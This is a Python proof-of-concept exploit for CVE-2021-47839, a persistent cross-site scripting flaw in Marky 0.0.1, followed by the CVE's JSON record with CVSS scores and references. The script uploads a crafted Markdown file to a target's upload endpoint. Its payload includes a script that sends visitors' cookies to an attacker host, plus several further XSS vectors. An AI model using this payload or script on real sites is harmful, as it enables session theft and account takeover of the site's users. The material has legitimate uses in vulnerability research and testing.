CVE-2021-47839

#!/usr/bin/env python3 """ CVE-2021-47839 PoC - Marky 0.0.1 Persistent XSS This PoC demonstrates how to exploit the persistent XSS vulnerability in Marky by uploading a malicious Markdown file. """ import requests import json TARGET_URL = "http://target-server.com" # Replace with actual target UPLOAD_ENDPOINT = f"{TARGET_URL}/upload" # Malicious Markdown payload with embedded JavaScript # This payload will execute JavaScript when the file is viewed MALICIOUS_PAYLOAD = '''# Document Title <script>alert("XSS Vulnerability Triggered - CVE-2021-47839");</script> ## Content This file contains a persistent XSS payload. <script> // Steal cookies and send to attacker document.write('<img src="http://attacker.com/log?cookie=' + document.cookie + '"/>'); </script> ## Additional Test Payloads: <img src=x onerror="alert(document.domain)"> <a href="javascript:alert(document.cookie)">Click me</a> <svg/onload=alert(document.cookie)> ''' def exploit_cve_2021_47839(): """ Upload malicious Markdown file to exploit persistent XSS """ files = { 'file': ('malicious.md', MALICIOUS_PAYLOAD, 'text/markdown') } try: # Upload the malicious file response = requests.post(UPLOAD_ENDPOINT, files=files) if response.status_code == 200: print("[+] Malicious file uploaded successfully!") print(f"[+] Payload will execute when file is viewed by any user") print(f"[+] Response: {response.text}") else: print(f"[-] Upload failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("CVE-2021-47839 Marky Persistent XSS Exploit") print("=" * 50) exploit_cve_2021_47839()

{"cve": {"id": "CVE-2021-47839", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:09.537", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Marky 0.0.1 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into markdown files. Attackers can upload crafted markdown files with embedded JavaScript payloads that execute when the file is opened, potentially enabling remote code execution."}, {"lang": "es", "value": "Marky 0.0.1 contiene una vulnerabilidad persistente de cross-site scripting que permite a los atacantes inyectar scripts maliciosos en archivos markdown. Los atacantes pueden subir archivos markdown manipulados con cargas útiles de JavaScript incrustadas que se ejecutan cuando se abre el archivo, lo que podría permitir la ejecución remota de código."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/vesparny/marky", "source": "[email protected]"}, {"url": "https://imgur.com/a/qclfrUx", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49831", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/marky-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/marky-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}